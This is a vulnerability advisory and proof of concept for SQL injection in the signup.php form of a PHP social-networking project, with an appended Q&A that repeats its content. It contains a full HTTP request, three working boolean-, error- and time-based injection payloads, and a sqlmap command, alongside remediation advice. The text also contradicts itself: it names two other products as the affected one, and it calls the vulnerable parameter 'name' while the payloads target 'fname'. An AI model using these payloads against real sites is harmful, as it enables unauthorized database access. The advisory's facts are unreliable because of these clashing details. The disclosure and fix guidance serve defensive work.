Code-projects Nero Social Networking Site In PHP With Source Code V1.0 Signup.php SQL Injection

Introduction

In this article, we will discuss a critical SQL injection vulnerability found in the signup.php file of the Nero Social Networking Site In PHP With Source Code project, version 1.0. This vulnerability allows attackers to inject malicious SQL code, leading to unauthorized database access, sensitive data leakage, and even service interruption.

Affected Product

• Restaurant Order System In PHP With Source Code

Vendor Homepage

• https://code-projects.org/nero-social-networking-site-in-php-with-source-code/

Affected and/or Fixed Version(s)

• Submitter: PB18
• Vulnerable File: signup.php
• Version(s): V1.0
• Software Link: https://download.code-projects.org/details/a84fcf5b-8aaa-4965-9cf0-2b0151b2a0fb

Problem Type

• Vulnerability Type: SQL injection
• Root Cause: The 'signup.php' file of the 'Restaurant Order System In PHP With Source Code' project contains a SQL injection vulnerability due to the lack of proper input validation and sanitization. Attackers can inject malicious SQL code by manipulating the 'name' parameter, allowing them to access unauthorized database data, modify or delete data, and access sensitive information without logging in.

Impact

• Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

Description

Due to insufficient user input verification for the "name" parameter, a serious SQL injection vulnerability has been discovered in the "Courier Management System In PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.

No Login Verification Required

The vulnerability in the 'signup.php' file of the 'Restaurant Order System In PHP With Source Code' project does not require login verification, making it easily exploitable by attackers.

Vulnerability Details and POC

HTTP Request

POST / HTTP/1.1
Host: 192.168.1.200:1111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 193
Origin: http://192.168.1.200:1111
Connection: close
Referer: http://192.168.1.200:1111/
Cookie: PHPSESSID=ek17ds2b6c542gs000uv69lj14
Upgrade-Insecure-Requests: 1
Priority: u=0, i

fname=123&lname=123123&login=123&password2=123123&cpassword=123123&address=123123&cnumber=123123123&propic=upload%2Fp.jpg&email=123123%40qq.com&gender=Female&month=09%2F02%2F2024&Submit=Sign+Up

Vulnerability Type

• Time-based blind
• Boolean-based blind
• Error-based

Vulnerability Location

• 'name' parameter

Payload

fname=123' RLIKE (SELECT (CASE WHEN (1677=1677) THEN 123 ELSE 0x28 END)) AND 'kCTl'='kCTl&lname=123123&login=123&password2=123123&cpassword=123123&address=123123&cnumber=123123123&propic=upload/p.jpg&email=123123@qq.com&gender=Female&month=09/02/2024&Submit=Sign Up

fname=123' AND GTID_SUBSET(CONCAT(0x716a707a71,(SELECT (ELT(6801=6801,1))),0x71786a6a71),6801) AND 'RLhD'='RLhD&lname=123123&login=123&password2=123123&cpassword=123123&address=123123&cnumber=123123123&propic=upload/p.jpg&email=123123@qq.com&gender=Female&month=09/02/2024&Submit=Sign Up

fname=123' AND (SELECT 7201 FROM (SELECT(SLEEP(5)))HktE) AND 'mkKF'='mkKF&lname=123123&login=123&password2=123123&cpassword=123123&address=123123&cnumber=123123123&propic=upload/p.jpg&email=123123@qq.com&gender=Female&month=09/02/2024&Submit=Sign Up

Screenshots of Specific Information Obtained from Testing and Running with the sqlmap Tool

sqlmap -r 123 --batch --dbs

Suggested Repair

To fix this SQL injection vulnerability, follow these steps:

1. Use Prepared Statements and Parameter Binding:

   • Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

2. Input Validation and Filtering:

   • Strictly validate and filter user input data to ensure it conforms to the expected format.

3. Minimize Database User Permissions:

   • Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.

4. Regular Security Audits:

   • Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
     Q&A: Code-Projects Nero Social Networking Site In PHP With Source Code v1.0 signup.php SQL Injection Vulnerability =====================================================================================

Q: What is the SQL injection vulnerability found in the 'signup.php' file of the 'Nero Social Networking Site In PHP With Source Code' project?

A: The SQL injection vulnerability found in the 'signup.php' file of the 'Nero Social Networking Site In PHP With Source Code' project is due to the lack of proper input validation and sanitization. Attackers can inject malicious SQL code by manipulating the 'name' parameter, allowing them to access unauthorized database data, modify or delete data, and access sensitive information without logging in.

Q: What are the potential consequences of exploiting this SQL injection vulnerability?

A: The potential consequences of exploiting this SQL injection vulnerability include unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

Q: Is login verification required to exploit this vulnerability?

A: No, login verification is not required to exploit this vulnerability. The vulnerability in the 'signup.php' file of the 'Nero Social Networking Site In PHP With Source Code' project does not require login verification, making it easily exploitable by attackers.

Q: What are the types of SQL injection attacks that can be performed using this vulnerability?

A: The types of SQL injection attacks that can be performed using this vulnerability include time-based blind, boolean-based blind, and error-based attacks.

Q: How can I protect my system from this SQL injection vulnerability?

A: To protect your system from this SQL injection vulnerability, follow these steps:

1. Use Prepared Statements and Parameter Binding:

   • Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

2. Input Validation and Filtering:

   • Strictly validate and filter user input data to ensure it conforms to the expected format.

3. Minimize Database User Permissions:

   • Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.

4. Regular Security Audits:

   • Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Q: What are some common mistakes that can lead to SQL injection vulnerabilities?

A: Some common mistakes that can lead to SQL injection vulnerabilities include:

• Not validating user input data:

  • Failing to validate user input data can allow attackers to inject malicious SQL code.

• Not using prepared statements:

  • Not using prepared statements can allow attackers to inject malicious SQL code.

• Not minimizing database user permissions:

  • Not minimizing database user permissions can allow attackers to access sensitive data and perform unauthorized operations.

Q: How can I detect and prevent SQL injection attacks?

A: To detect and prevent SQL injection attacks, follow these steps:

1. Use a Web Application Firewall (WAF):

   A WAF can help detect and prevent SQL injection attacks by analyzing incoming traffic and blocking malicious requests.

2. Regularly Monitor System Logs:

   • Regularly monitoring system logs can help detect and prevent SQL injection attacks by identifying suspicious activity.

3. Use a Database Firewall:

   • A database firewall can help detect and prevent SQL injection attacks by analyzing database traffic and blocking malicious requests.

4. Regularly Conduct Code and System Security Audits:

   • Regularly conducting code and system security audits can help detect and prevent SQL injection attacks by identifying potential vulnerabilities.